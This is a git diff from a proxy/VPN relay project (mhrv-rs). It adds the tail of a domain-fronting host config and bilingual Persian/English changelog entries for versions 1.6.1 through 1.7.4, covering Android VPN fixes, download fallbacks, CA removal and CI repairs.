+        "fastly-terrarium.com",
+        "fastly.io",
+        "fastly.net",
+        "fastlylabs.com",
+        "fastlylb.net",
+
+        "www.pinterest.com",
+        "pinimg.com",
+        
+        "cnn.com",
+        "cnn.io",
+        "cnn.it",
+        "cnnarabic.com",
+        "cnnlabs.com",
+        "cnnmoney.ch",
+        "cnnmoney.com",
+        "cnnmoneystream.com",
+        "cnnpolitics.com",
+
+        "buzzfeed.com"
+      ]
+    },
+    {
+      "name": "netlify",
+      "ip": "35.157.26.135",
+      "sni": "letsencrypt.org",
+      "domains": [
+        "netlify.app",
+        "netlify.com"
+      ]
+    }
+  ]
+}
diff --git a/docs/changelog/v1.6.1.md b/docs/changelog/v1.6.1.md
new file mode 100644
index 00000000..d5e72c8d
--- /dev/null
+++ b/docs/changelog/v1.6.1.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• پایداری چرخه‌ٔ سشن VPN در اندروید ([#187](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/187)): پنج رفع باگ کوچک ولی واقعی در سرویس VPN اندروید: (۱) دکمهٔ Connect/Disconnect حالا روی state-flow `VpnState.isRunning` گیت میشه (با backstop ۱۲ ثانیه‌ای) به جای تایمر ثابت ۲ ثانیه — جلوی race condition بین Stop و Connect رو می‌گیره که قبلاً منجر به `Address already in use` می‌شد. (۲) `Tun2proxy.stop()` حالا با timeout ۲ ثانیه‌ای بسته شده تا اگر روی native call hang کنه، کل teardown thread رو نگه نداره. (۳) رفع نشت file descriptor بین `detachFd()` و `Thread.start()` — اگه start بخاطر OOM throw می‌کرد، fd یتیم می‌شد. (۴) doc-comment گمراه‌کننده در teardown اصلاح شد. (۵) handler crash trap حالا `Log.e` رو در try/catch می‌پیچه تا اگه خود لاگ throw کنه، handler بازگشتی نشه
+---
+• Android VPN session lifecycle reliability ([#187](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/187)): five small but real fixes in the Android VPN service. (1) Connect/Disconnect button is now gated on the `VpnState.isRunning` state flow with a 12 s backstop instead of a fixed 2 s `transitionCooldown` timer — closes the race window where users tapping Connect right after Stop would hit "Address already in use" because the previous teardown's listener-socket release hadn't completed yet. (2) `Tun2proxy.stop()` is now wrapped in a 2 s `join()` timeout — if the native call hangs, the bounded tun2proxy thread join + bounded `rt.shutdown_timeout` below it still release the listener port instead of holding the teardown thread. (3) File-descriptor leak fixed between `parcelFd.detachFd()` and `Thread.start()` — if `start()` threw (OOM under memory pressure), the detached fd had no owner and leaked for the process lifetime; now adopted into a fresh `ParcelFileDescriptor` purely so we can `close()` it. (4) Misleading teardown doc-comment rewritten — the "step 2 closes the TUN fd to force EBADF on read" claim has been factually wrong since `detachFd` landed; corrected so future debuggers don't chase a phantom safety net. (5) Recursive crash trap in `MhrvApp`'s uncaught-exception handler — `Log.e` is now wrapped in try/catch so a logd failure during exception logging falls through to the previous handler with the real exception
diff --git a/docs/changelog/v1.6.2.md b/docs/changelog/v1.6.2.md
new file mode 100644
index 00000000..402d8a5e
--- /dev/null
+++ b/docs/changelog/v1.6.2.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "همهٔ دانلودها روی ۲۵۶ کیلوبایت قطع میشن" ([#162](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/162)): در relay range-parallel، اگه validation هر chunk رد می‌شد (مثلاً Apps Script هدر `Content-Range` رو حذف می‌کرد، یا origin روی chunkهای بعدی به جای 206 یه 200 برمی‌گردوند)، fallback اشتباهی پاسخ probe (یعنی فقط ۲۵۶ کیلوبایت اول) رو به‌عنوان فایل کامل برمی‌گردوند. مرورگر `HTTP 200` با `Content-Length=262144` می‌دید و دانلود رو "کامل" تلقی می‌کرد. حالا fallback یک GET تک‌مرحله‌ای جدید بدون Range هدر می‌فرسته که Apps Script کل URL رو fetch کنه (تا سقف ۵۰ مگ). برای فایل‌های بزرگ‌تر کندتره از مسیر parallel، ولی پاسخ کامل می‌ده — که اون چیزی هست که اهمیت داره. ۲ کاربر مستقل این رو ریپورت کردن (Ehsan، Recruit1992)
+---
+• Fix "every download capped at 256 KB" bug ([#162](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/162)): in range-parallel relay, when any chunk failed validation (e.g. Apps Script stripping the `Content-Range` header on follow-up chunks, or origin returning 200-instead-of-206 on later chunks), the fallback path silently returned the probe response (the first 256 KiB) as if it were the full file. Browsers saw `HTTP 200` with `Content-Length=262144` and treated the download as complete. The fallback now does a fresh single GET without the Range header, letting Apps Script fetch the full URL (up to its 50 MiB cap). Slower than the parallel path for large files, but produces a complete response — which is what matters. Two independent users (Ehsan, Recruit1992) reported this; closed-loop with both
diff --git a/docs/changelog/v1.6.3.md b/docs/changelog/v1.6.3.md
new file mode 100644
index 00000000..7be78d25
--- /dev/null
+++ b/docs/changelog/v1.6.3.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "نوتیفیکیشن سرور اندروید پورت اشتباه SOCKS5 رو نشون می‌داد" ([#211](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/211)): با تنظیمات پیش‌فرض اندروید (`listenPort=8080`, `socks5Port=1081`)، نوتیفیکیشن می‌نوشت `Routing via SOCKS5 127.0.0.1:8081` که اشتباه بود — listener واقعی روی `1081` اجرا می‌شد. هر کاربری که پروکسی تلگرام رو روی پورت نوتیفیکیشن (8081) ست می‌کرد، در سکوت fail می‌شد. علت: تابع `buildNotif` به‌جای خوندن `cfg.socks5Port`، hardcode می‌کرد `proxyPort + 1`. حالا متن نوتیفیکیشن همون منطق elvis fallback `cfg.socks5Port ?: (cfg.listenPort + 1)` رو که در تنظیم listener واقعی استفاده می‌شه می‌خونه و علاوه بر SOCKS5، پورت HTTP رو هم نشون می‌ده: `HTTP 127.0.0.1:8080  ·  SOCKS5 127.0.0.1:1081`. ۲ کاربر مستقل ریپورت کردن (vpnineh، l3est)
+---
+• Fix "Android server notification showed wrong SOCKS5 port" bug ([#211](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/211)): with the default Android config (`listenPort=8080`, `socks5Port=1081`), the foreground-service notification read `Routing via SOCKS5 127.0.0.1:8081` — wrong, since the real listener was on `1081`. Anyone configuring Telegram (or any per-app SOCKS5 client) against the notification value silently failed. Cause: `buildNotif` hardcoded `proxyPort + 1` instead of reading `cfg.socks5Port`. The notification now uses the same elvis fallback `cfg.socks5Port ?: (cfg.listenPort + 1)` that the actual listener uses, and shows both ports for clarity: `HTTP 127.0.0.1:8080  ·  SOCKS5 127.0.0.1:1081`. Two independent users (vpnineh, l3est) reported this
diff --git a/docs/changelog/v1.6.4.md b/docs/changelog/v1.6.4.md
new file mode 100644
index 00000000..0461620f
--- /dev/null
+++ b/docs/changelog/v1.6.4.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "L7 multiplexer در Full mode batch نمی‌کنه" ([#231](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/231)): در حالت Full، انتظار می‌رفت که چند op به یک batch HTTP request به Apps Script ترکیب بشن (`batch: 5 ops` یا `batch: 10 ops`)، ولی log نشون می‌داد همیشه `batch: 1 ops` — یعنی هر op جدا یه round-trip Apps Script می‌گرفت (که هر کدوم 2 تا 7 ثانیه طول می‌کشن). علت: loop دریافت پیام بلافاصله بعد از اولین message با `try_recv()` (non-blocking) صف رو drain می‌کرد، بدون pause برای جمع‌آوری بقیه ops. **Fix:** بعد از اولین op، یه پنجرهٔ ۸ میلی‌ثانیه‌ای باز می‌مونه تا opهای بعدی (مثل parallel fetches، HTTP/2 streams) همون batch رو پر کنن. ۸ms در مقابل ~۲ تا ۷ ثانیه RTT Apps Script اصلاً ناچیزه ولی efficiency batching رو برمی‌گردونه. ریپورت شده توسط w0l4i با log واضح
+---
+• Fix "L7 multiplexer not batching in Full mode" bug ([#231](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/231)): in `full` mode, multiple ops should coalesce into a single batched HTTP request to Apps Script (`batch: 5 ops` or `batch: 10 ops`), but logs showed `batch: 1 ops` consistently — each op got its own Apps Script round-trip (2-7 s each). Cause: the receive loop drained the channel via `try_recv()` (non-blocking) immediately after the first message arrived, with no window to let concurrent ops accumulate. **Fix:** after the first op lands, hold the buffer open for an 8 ms coalescing window so concurrent ops (parallel fetches, HTTP/2 stream openings, etc.) land in the same batch. 8 ms is rounding error against the ~2-7 s Apps Script RTT but restores the entire batching premise. Reported by w0l4i with a clean log snippet
diff --git a/docs/changelog/v1.6.5.md b/docs/changelog/v1.6.5.md
new file mode 100644
index 00000000..ab870666
--- /dev/null
+++ b/docs/changelog/v1.6.5.md
@@ -0,0 +1,10 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• اضافه شدن twitter.com به URL normalization اکس/توییتر ([#245](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/245)): قبلاً normalization GraphQL URL فقط روی `x.com` کار می‌کرد. کاربری که از extension "Control Panel for Twitter" استفاده می‌کنه که همه‌چی رو به `twitter.com` redirect می‌کنه، URL shortening رو از دست می‌داد و درخواست‌هاش به Apps Script `URI Too Long` می‌گرفت. حالا match هر دو domain رو می‌گیره. ممنون از Parsa307
+• امکان کپی log در نسخهٔ اندروید ([#255](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/255)): دکمهٔ Copy کنار Clear در Live Log اضافه شد. خط‌های log الان قابل selection هستن. تا قبل از این، گرفتن log از گوشی نیازمند `adb logcat` بود — برای کاربرهایی که issue با logcat تجربه ندارن، debug کردن سخت بود. ممنون از @dazzling-no-more
+• اضافه کردن چندین deployment ID به‌صورت یکجا در نسخهٔ اندروید ([#257](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/257)): فیلد "+ Add" حالا multi-line هست و paste کردن لیست IDها (با newline، کاما، یا semicolon جدا شده) رو می‌پذیره. paste در یه entry موجود هم automatic بهش split و expand می‌شه. تا قبل از این، اضافه کردن ۶ تا ID نیازمند ۶ بار tap "+ Add" بود. ممنون از @dazzling-no-more
+• رفع باگ "google_only mode: plain HTTP proxy requests are not supported" ([#256](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/256)): تایپ کردن `http://example.com` (بدون https) در browser در حالت google_only یه ۵۰۲ می‌داد، در حالی که `https://example.com` (CONNECT) خوب fall-through می‌کرد به direct TCP. حالا plain HTTP proxy request هم passthrough می‌شه (با حفظ `upstream_socks5` اگه ست شده). ۴ تا unit test جدید برای parsing absolute-form URI، fallback به Host header، و edge cases IPv6. ممنون از @dazzling-no-more
+---
+• Add twitter.com to X/Twitter URL normalization ([#245](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/245)): the GraphQL `?variables=...` shortening previously only matched `x.com`. Users running the "Control Panel for Twitter" extension (which redirects everything back to `twitter.com`) lost the shortening and hit `URI Too Long` from Apps Script. Now matches both domains. Thanks Parsa307
+• Add ability to copy logs in Android ([#255](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/255)): Copy button added next to Clear in the Live Log pane; log lines are now selectable. Before this, getting logs off the device required tethering with `adb logcat` — a barrier for users without that experience. Thanks @dazzling-no-more
+• Add bulk parser for deployment IDs in Android ([#257](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/257)): the "+ Add" field is now multi-line and accepts a paste of multiple IDs separated by whitespace/newline/comma/semicolon. Pasting into an existing entry also auto-splits and expands. Adding 6 IDs used to require 6 separate "+ Add" taps. Thanks @dazzling-no-more
+• Fix "google_only mode: plain HTTP proxy requests are not supported" 502 ([#256](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/256)): typing `http://example.com` (without https) in the browser in google_only mode returned a 502, even though `https://example.com` (CONNECT) fell through cleanly to direct TCP. Plain-HTTP proxy requests now passthrough too (honoring `upstream_socks5` if set). 4 new unit tests covering absolute-form URI parsing, Host-header fallback, and IPv6 edge cases. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.0.md b/docs/changelog/v1.7.0.md
new file mode 100644
index 00000000..bbbd940e
--- /dev/null
+++ b/docs/changelog/v1.7.0.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• پشتیبانی native از پروتکل udpgw در Full mode ([#222](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/222)): tunnel-node حالا یه virtual session جدید برای آدرس magic `198.18.0.1:7300` داره که tun2proxy اندروید بهش وصل می‌شه. به جای یه session UDP per-destination، تمام UDP از همون یه TCP persistent tunnel می‌گذره. **نتیجه**: تماس صوتی/تصویری Telegram و Google Meet در Full mode روی اندروید کار می‌کنن (تا قبل از این، سرعت شناوری STUN/RTP زیاد بود برای session-per-destination polling). QUIC (UDP/443) و DNS (UDP/53) به‌صورت گاردبل از udpgw مسدود می‌شن — مرورگرها به TCP/HTTPS fallback می‌کنن (سریع‌تر از QUIC over batched relay)، و DNS از virtual DNS tun2proxy استفاده می‌کنه (پایدارتر). **نیاز به redeployment image Docker tunnel-node داره**: `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:1.7.0`. ممنون از @yyoyoian-pixel
+• چیدمان مجدد صفحهٔ اصلی اندروید برای لیست‌های بلند deployment-ID ([#258](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/258)، closes [#246](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/246)): دکمهٔ Connect/Disconnect حالا زیر فیلد Mode pinned هست — قبلاً اگه ۱۰ تا deployment ID داشتید، باید کل لیست رو scroll می‌کردید برای رسیدن به Connect. App picker هم حالا appهای از قبل انتخاب‌شده رو در بالای لیست نشون می‌ده، نه پراکنده در ترتیب alphabetical. ممنون از @dazzling-no-more
+• tooling release-drafter + prepare-release ([#260](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/260)): release-drafter به‌صورت تدریجی PRهای merge شده رو در یه draft release جمع می‌کنه که در زمان tag دادن آماده هست. workflow `prepare-release.yml` (manual dispatch) خودکار `Cargo.toml` و `build.gradle.kts` رو bump می‌کنه و یه stub `docs/changelog/v<ver>.md` می‌سازه که maintainer فقط Persian half + verb tense fixes رو کامل می‌کنه. flow release موجود (matrix build → GH release → Telegram) دست نخورده. ممنون از @dazzling-no-more
+---
+• Native udpgw protocol support in Full mode ([#222](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/222)): tunnel-node now hosts a virtual session at the magic address `198.18.0.1:7300` that Android's tun2proxy connects to. Instead of a UDP session per destination, all UDP flows through one persistent TCP tunnel. **Result**: Telegram voice/video calls and Google Meet now work in Full mode on Android (per-destination polling previously stalled under STUN/RTP flow counts). QUIC (UDP/443) and DNS (UDP/53) are blocked from udpgw as a belt-and-suspenders guard — browsers fall back to TCP/HTTPS (faster through the batch pipeline than QUIC), and DNS uses tun2proxy's virtual DNS (more reliable). **Requires redeploying the tunnel-node Docker image**: `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:1.7.0`. Thanks @yyoyoian-pixel
+• Restructured Android home screen for long deployment-ID lists ([#258](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/258), closes [#246](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/246)): Connect/Disconnect button is now pinned right under the Mode field — previously, with 10+ deployment IDs the user had to scroll past the entire list to reach Connect every session. App picker now shows pre-selected apps at the top instead of scattered through the alphabetical list. Thanks @dazzling-no-more
+• Release-drafter + prepare-release tooling ([#260](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/260)): release-drafter incrementally accumulates merged-PR titles into a draft release that's ready when it's tag time. The `prepare-release.yml` workflow (manual dispatch) auto-bumps `Cargo.toml` and `build.gradle.kts` and writes a `docs/changelog/v<ver>.md` stub the maintainer only has to translate to Persian and fix verb tenses on. Existing release flow (matrix build → GH release → Telegram) untouched. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.1.md b/docs/changelog/v1.7.1.md
new file mode 100644
index 00000000..79582d63
--- /dev/null
+++ b/docs/changelog/v1.7.1.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• امکان حذف CA به‌صورت verified ([#121](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/121)): فلگ جدید `mhrv-rs --remove-cert` (CLI) و دکمهٔ **Remove CA** در UI دسکتاپ. CA رو از trust store سیستم‌عامل (Keychain مک، anchor dirs لینوکس، Trusted Root ویندوز)، NSS مرورگرها (Firefox/Chrome در لینوکس)، و فولدر `ca/` روی دیسک پاک می‌کنه. **`config.json` و deployment Apps Script شما دست نمی‌خوره — نیاز به redeploy نیست.** قبل از هر کاری با store، یه trust verification by-name انجام می‌شه؛ اگه remove از سیستم‌عامل fail بشه، browser state دست نمی‌خوره و حالت `RemovalIncomplete` گزارش می‌شه (retry idempotent). در Unix، اگه با sudo اجرا بشه، HOME رو به user واقعی re-root می‌کنه تا path‌های user-scoped (NSS profile، login keychain) به /root نرن. ۲۹ unit test جدید پوشش‌دهی pure logic. تست شده end-to-end در ویندوز، و **در v1.7.1 من مسیر macOS رو هم با hardware واقعی verify کردم** (login keychain delete کار می‌کنه، NSS certutil-missing graceful fallback می‌ده). مسیر Linux منتظر تست از کاربرها. ممنون از @dazzling-no-more
+---
+• Verified CA removal ([#121](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/121)): new `mhrv-rs --remove-cert` flag (CLI) and a **Remove CA** button in the desktop UI. Clears the CA from the OS trust store (macOS Keychain, Linux anchor dirs, Windows Trusted Root), NSS browser stores (Firefox/Chrome on Linux), and the on-disk `ca/` directory. **`config.json` and your Apps Script deployment are never touched — no redeploy needed.** A by-name trust verification runs *before* any browser-state mutation; if the OS removal fails, browser state is left alone and the call returns `RemovalIncomplete` (idempotent retries). On Unix, if invoked under sudo, `HOME` is re-rooted to the real user so user-scoped paths (NSS profile, login keychain) target the user, not root. 29 new unit tests covering the pure logic. Tested end-to-end on Windows by the contributor, and **the macOS path was verified on real hardware** during merge (login-keychain delete works; NSS-certutil-missing path falls back cleanly). Linux paths await user testing. Thanks @dazzling-no-more
diff --git a/docs/changelog/v1.7.10.md b/docs/changelog/v1.7.10.md
new file mode 100644
index 00000000..6af68b83
--- /dev/null
+++ b/docs/changelog/v1.7.10.md
@@ -0,0 +1,8 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "GET کامل غیرضروری وقتی Apps Script body gzip رو decode می‌کنه" ([#337](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/337)): وقتی Apps Script یه gzip body رو decode می‌کرد ولی Content-Range origin رو unchanged نگه می‌داشت، validation strict ما اون response رو reject می‌کرد + یک GET کامل دوباره می‌فرستادیم — quota Apps Script هدر می‌رفت. fix carve-out اضافه می‌کنه: اگر Content-Range proves entity کامل در probe اول گنجیده، 206 رو به 200 rewrite کنیم بدون refetch. validation strict برای real Range request‌های client + chunkهای بعدی حفظ شده. همچنین تشخیص quota error برای string‌های آلمانی (`bandbreitenkontingent`، `datenübertragungsrate`) و generic (`bandwidth`، `transfer rate`، `limit exceeded`) اضافه شد، تا deployment‌هایی که رو quota account‌های Google غیرانگلیسی هستند به‌درستی blacklist بشن. ممنون از @freeinternet865
+• رفع UI Android "Config detected in clipboard" که روی Android 13+ سپس از resume کار نمی‌کرد ([#344](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/344)): Android 13+ دسترسی clipboard background-to-foreground رو محدود می‌کنه — auto-detect ساکت empty می‌گرفت + banner ظاهر نمی‌شد. fix: یک دکمهٔ permanent **Paste** که روی tap clipboard رو می‌خونه (user interaction permission می‌ده در همه versionها). دکمهٔ Export به‌صورت icon-only تا row بهینه باقی بمونه. ممنون از @yyoyoian-pixel
+• Fix CI workflow incompatibility for Win7 i686 build ([#318 follow-up](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)): job pinned-Rust-1.77.2 برای target Win7 i686 fail می‌کرد چون `Cargo.lock` (تولید شده توسط Rust ≥1.78) از lockfile version 4 استفاده می‌کرد + Rust 1.77 فقط version 3 رو می‌فهمه. regenerate Cargo.lock فقط روی job pinned اضافه شد — مهم: artifact `mhrv-rs-windows-i686.zip` که در v1.7.9 missing بود، در v1.7.10 reappear می‌کنه (Win7 SP1-loadable).
+---
+• Fix "unnecessary fallback full GET when Apps Script decodes a gzip body" ([#337](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/337)): when Apps Script decoded a gzip body but echoed the origin's compressed `Content-Range` unchanged, our strict validator rejected the response and we'd retry with a full GET — wasting Apps Script quota. The fix adds a carve-out: if `Content-Range` proves the entity already fits in the synthetic first probe, rewrite the 206 to a 200 and skip the refetch. Strict validation is still applied to real client `Range` requests and to later chunks. Also adds quota-error string matching for German (`bandbreitenkontingent`, `datenübertragungsrate`) and generic (`bandwidth`, `transfer rate`, `limit exceeded`) phrasings, so deployments hitting quota under non-English Google account locales now blacklist correctly. Thanks @freeinternet865.
+• Fix Android "Config detected in clipboard" banner that silently broke on Android 13+ after resume ([#344](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/344)): Android 13+ restricts background-to-foreground clipboard access, so `getPrimaryClip()` during recomposition silently returned empty — the banner never showed. Fix: replace the auto-detect banner with a permanent **Paste** button that reads on tap (user interaction grants clipboard access on every Android version). Export button becomes icon-only to keep the row compact. Thanks @yyoyoian-pixel.
+• Fix the CI Win7 i686 build that silently regressed in v1.7.9 ([#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318) follow-up): the pinned-Rust-1.77.2 job for the i686 target failed because `Cargo.lock` (generated by stable Rust ≥1.78) uses lockfile version 4, which Rust 1.77 doesn't understand. The job now regenerates the lockfile with the pinned toolchain before building. The `mhrv-rs-windows-i686.zip` artifact that disappeared from the v1.7.9 release page reappears in v1.7.10 (and now actually loads on Win7 SP1).
diff --git a/docs/changelog/v1.7.11.md b/docs/changelog/v1.7.11.md
new file mode 100644
index 00000000..4de1518d
--- /dev/null
+++ b/docs/changelog/v1.7.11.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• v1.7.10 release page assets منتشر نشد (CI failures): دو bug همزمان بودن — (۱) target `i686-pc-windows-msvc` که در v1.7.7 برای Win7 32-bit اضافه شده بود، در v1.7.10 fail کرد چون Rust 1.77.2 (آخرین stable Win7-compat) نمی‌تونه manifest crate‌های مدرن مثل `time` 0.3.47 رو parse کنه؛ pinning transitive crate‌ها در هر release dep MSRV بمپ می‌کنن غیرقابل دفاع است. (۲) job `release` با `actions/download-artifact@v4` با ۵-retry-exhausted error fail شد. **Fix:** target i686 از matrix حذف شد (کاربران Win7 ۳۲ بیتی باید self-build کنن — instructions در [#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318))؛ release و telegram jobs به `gh run download` با retry loop ۳-attempt تبدیل شدن. v1.7.11 release اولین کاملی هست که از v1.7.9 منتشر می‌شه با همه fixهای v1.7.10 (Apps Script range probe + Android Paste button) plus این workflow fix.
+---
+• v1.7.10 release page assets failed to publish (CI failures): two concurrent bugs — (1) the `i686-pc-windows-msvc` target added in v1.7.7 for Win7 32-bit support broke in v1.7.10 because Rust 1.77.2 (the last stable that produces Win7-compatible binaries) can't parse the manifest of modern transitive crates like `time` 0.3.47; pinning transitives at every release where a dep bumps MSRV is brittle and unsustainable. (2) The `release` job's `actions/download-artifact@v4` step hit a 5-retries-exhausted error. **Fix:** dropped the i686 target from the matrix entirely (Win7 32-bit users must self-build now — instructions in [#318](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/318)); the `release` and `telegram` jobs now use `gh run download` with a 3-attempt retry loop. v1.7.11 is the first complete release published since v1.7.9 and ships all the v1.7.10 fixes (Apps Script range probe handling per #337, Android Paste button per #344) along with this workflow repair.
diff --git a/docs/changelog/v1.7.2.md b/docs/changelog/v1.7.2.md
new file mode 100644
index 00000000..22be861d
--- /dev/null
+++ b/docs/changelog/v1.7.2.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• import/export کانفیگ در نسخهٔ اندروید با QR code، کلیپ‌بورد، deep link، و share sheet ([#266](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/266)): انتقال کانفیگ بین دستگاه‌ها با یک تپ. **Export**: یک دیالوگ یکپارچه با QR code + رشتهٔ فشرده + دکمهٔ کپی، یا Share از طریق هر اپ (تلگرام، WhatsApp، ایمیل). فیلدهای device-specific (پورت‌ها، حالت VPN/proxy، splitMode) export نمی‌شن، فقط فیلدهای منطقی (mode، script_ids، auth_key، sni_hosts، passthrough_hosts، upstream_socks5). encoding با DEFLATE compression + base64 — کانفیگ معمولی ~۲۰۰ کاراکتر می‌شه به‌جای ~۸۰۰. **Import**: clipboard banner خودکار وقتی مهرو متن `mhrv-rs://` یا JSON خام در clipboard می‌بینه، scanner QR، یا deep link `mhrv-rs://...` (تپ روی لینک در هر اپ). **هر import نیاز به تأیید صریح کاربر داره** — قبل از overwrite شدن کانفیگ فعلی، یه دیالوگ deployment IDهای جدید رو نشون می‌ده و هشدار میده که "این لینک ترافیک شما رو از طریق این deployment IDها مسیریابی می‌کنه — فقط از منابع قابل اعتماد import کنید." این مهمه چون کانفیگ شامل auth_key هست. ممنون از @yyoyoian-pixel
+---
+• Config import/export on Android via QR code, clipboard, deep link, and share sheet ([#266](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/266)): one-tap config sharing between devices. **Export**: a unified dialog with QR code + compressed text hash + copy button, or Share via any app (Telegram, WhatsApp, email). Device-specific fields (ports, VPN/proxy mode, splitMode) are not exported — only logical config (mode, script_ids, auth_key, sni_hosts, passthrough_hosts, upstream_socks5). DEFLATE compression + base64 encoding shrinks a typical config from ~800 to ~200 chars. **Import**: clipboard banner auto-appears when mhrv-rs detects `mhrv-rs://...` or raw JSON in clipboard, QR scanner, or deep link `mhrv-rs://...` (tap from any app). **Every import path requires explicit user confirmation** — before the current config is overwritten, a dialog displays the new deployment IDs and warns "this link routes your traffic through these deployment IDs — only import from sources you trust." Important because the config contains `auth_key`. Thanks @yyoyoian-pixel
diff --git a/docs/changelog/v1.7.3.md b/docs/changelog/v1.7.3.md
new file mode 100644
index 00000000..d7ae76cf
--- /dev/null
+++ b/docs/changelog/v1.7.3.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• حذف نیاز به فورک tun2proxy ([#271](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/271)): v1.7.0 از یه فورک شخصی tun2proxy (با پارامتر `udpgw_server` در JNI) استفاده می‌کرد چون upstream هنوز feature flag `udpgw` رو منتشر نکرده بود. حالا که tun2proxy 0.7.21 رسماً روی crates.io با feature flag `udpgw` در دسترسه + maintainer toolchain CLI API رو به‌عنوان مسیر صحیح برای کاربران Android معرفی کرد، فورک رو حذف می‌کنیم. روش جدید: mhrv-rs از طریق `dlsym` در زمان اجرا تابع `tun2proxy_run_with_cli_args` رو از `libtun2proxy.so` resolve می‌کنه و CLI args ساده می‌فرسته (`--proxy socks5://127.0.0.1:1081 --tun-fd <fd> --udpgw-server 198.18.0.1:7300 ...`). نه فورک، نه `[patch.crates-io]`، نه commit SHA. وقتی tun2proxy update می‌شه، فقط نسخهٔ crates.io رو bump می‌کنیم. ممنون از @yyoyoian-pixel
+---
+• Drop the tun2proxy fork dependency ([#271](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/271)): v1.7.0 used a personal fork of tun2proxy (with a `udpgw_server` parameter added to the JNI signature) because upstream hadn't published the `udpgw` feature flag yet. With tun2proxy 0.7.21 now on crates.io with `udpgw` feature flag, and the upstream maintainer pointing callers at the C-style CLI API as the recommended path for Android, we drop the fork. New approach: mhrv-rs resolves `tun2proxy_run_with_cli_args` from `libtun2proxy.so` at runtime via `dlsym` and passes a simple CLI string (`--proxy socks5://127.0.0.1:1081 --tun-fd <fd> --udpgw-server 198.18.0.1:7300 ...`). No fork, no `[patch.crates-io]`, no pinned SHA. Future tun2proxy upgrades are a single Cargo version bump. Thanks @yyoyoian-pixel
diff --git a/docs/changelog/v1.7.4.md b/docs/changelog/v1.7.4.md
new file mode 100644
index 00000000..869109b1
--- /dev/null
+++ b/docs/changelog/v1.7.4.md
@@ -0,0 +1,6 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• رفع باگ "video timeout با send YouTube through relay" ([#275](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/275)): قبلاً وقتی `youtube_via_relay = true` بود، تمام دامنه‌های مرتبط با YouTube از طریق Apps Script رد می‌شدن، شامل `googlevideo.com` (chunkهای video) و `ytimg.com` (thumbnails). نتیجه: یک chunk timeout کل پخش video رو در Firefox abort می‌کرد، و video طولانی به ۶ دقیقه cap اجرای Apps Script می‌خورد. **Fix:** حالا `youtube_via_relay` فقط API/HTML رو از relay رد می‌کنه (`youtube.com`, `youtu.be`, `youtube-nocookie.com`, `youtubei.googleapis.com` — جایی که Restricted Mode enforce می‌شه)، در حالی که CDNهای video/image مستقیماً از Google edge می‌گذرن (`googlevideo.com` که در نسخه‌های قبل اصلاً در لیست SNI rewrite نبود اضافه شد، `ytimg.com`، `ggpht.com`). نتیجه: Restricted Mode بدون قطع شدن video. ممنون از @amirabbas117 برای تحلیل دقیق
